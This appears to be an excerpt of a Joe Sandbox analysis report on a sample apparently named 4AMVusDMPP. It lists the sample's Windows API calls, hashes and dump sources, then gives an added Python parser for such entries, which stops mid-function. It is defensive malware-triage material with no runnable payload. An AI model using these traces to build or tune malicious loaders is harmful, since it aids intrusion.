                                                          • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                          • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                          • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                          • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                          • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                          • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                          • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                          • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                          • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                          • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                          • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                          • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004032F2
                                                            • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                          • SetFilePointer.KERNELBASE(0015F89E,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FilePointer$CountTick
                                                          • String ID:
                                                          • API String ID: 1092082344-0
                                                          • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                          • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                          • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                          • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                          • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                          • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                          • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                          APIs
                                                          • GlobalFree.KERNEL32(004E1B58), ref: 00401BE7
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
                                                          • API String ID: 3394109436-1824292864
                                                          • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                          • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                          • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                          • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000000,00000011,00000002), ref: 00402557
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: Enum$CloseValue
• String ID:
• API String ID: 397863658-0
• Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
• Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
• Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
• Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
APIs
• SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
• Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
• Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
• Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
APIs
  • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405D76
  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
  • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
• SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID:
• API String ID: 1892508949-0
• Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
• Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
• Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
• Instruction Fuzzy Hash: 0111E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000000,00000011,00000002), ref: 00402557
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
• Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
• Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
• Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
• Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
• Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
• Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
• Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
APIs
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
• RegCloseKey.ADVAPI32(00000000), ref: 004023B9
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: CloseDeleteValue
• String ID:
• API String ID: 2831762973-0
• Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
• Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
• Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
• Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401E67
• EnableWindow.USER32(00000000,00000000), ref: 00401E72
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
• Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
• Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
• Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
• GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
  • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
  • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
  • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
• Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
• Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
• Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
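The function entries in this report list each call as Name.MODULE(args), ref: call-site address, with calls made inside a callee marked "Part of subcall function", and the Similarity block carries the API ID and API String ID used for pivoting. The following is an added example, not code from Joe Sandbox or from the analysed sample: a Python parser that turns two such entries (the GetModuleHandleA/GetProcAddress entry directly above and the RegEnumKeyW entry earlier on this page, copied here as constructed sample input) into records, so the API set of each function can be queried and the LoadLibraryExW flag argument decoded. It assumes a plain-text export that keeps one bullet per API call and the section headers intact; the helper names (parse_entries, functions_calling, loadlibrary_flags) are the example's own.

```python
"""Parse the per-function 'APIs' / 'Similarity' entries of a Joe Sandbox report
into records that can be queried (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two entries copied in the report's layout. Assumption: the
# plain-text export keeps one bullet per API call and the section headers intact.
SAMPLE = r"""
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
• GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
  • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
  • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
  • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• API String ID: 2547128583-0
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000000,00000011,00000002), ref: 00402557
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Enum$CloseValue
• API String ID: 397863658-0
"""

# One API bullet: optional "Part of subcall function XXXXXXXX:" prefix, Name.MODULE,
# optional "(args)", then "ref: <call-site address>".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # int for 8-hex-digit values, None for '?', str otherwise
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # callee the report attributes the call to, if any

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    image_base: Optional[int] = None  # 'Offset:' of the source dump
    api_id: str = ""
    api_string_id: str = ""

    def api_names(self) -> set:
        return {c.name for c in self.apis}

def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_entries(text: str) -> list:
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":                       # each function entry starts here
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
        elif s.startswith("• Source File:"):
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", s)
            cur.image_base = int(off.group(1), 16) if off else None
        elif s.startswith("• API ID:"):
            cur.api_id = s.split(":", 1)[1].strip()
        elif s.startswith("• API String ID:"):
            cur.api_string_id = s.split(":", 1)[1].strip()
    return entries

def functions_calling(entries: list, required: set) -> list:
    """Entries whose API set (attributed subcalls included) covers `required`."""
    return [e for e in entries if required <= e.api_names()]

# dwFlags values of LoadLibraryExW as defined in the Win32 SDK headers.
LOADLIB_FLAGS = {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
                 0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32"}

def loadlibrary_flags(entry: FunctionEntry) -> list:
    """Decode the third argument of every LoadLibraryExW call in the entry."""
    out = []
    for c in entry.apis:
        if c.name == "LoadLibraryExW" and len(c.args) == 3 and isinstance(c.args[2], int):
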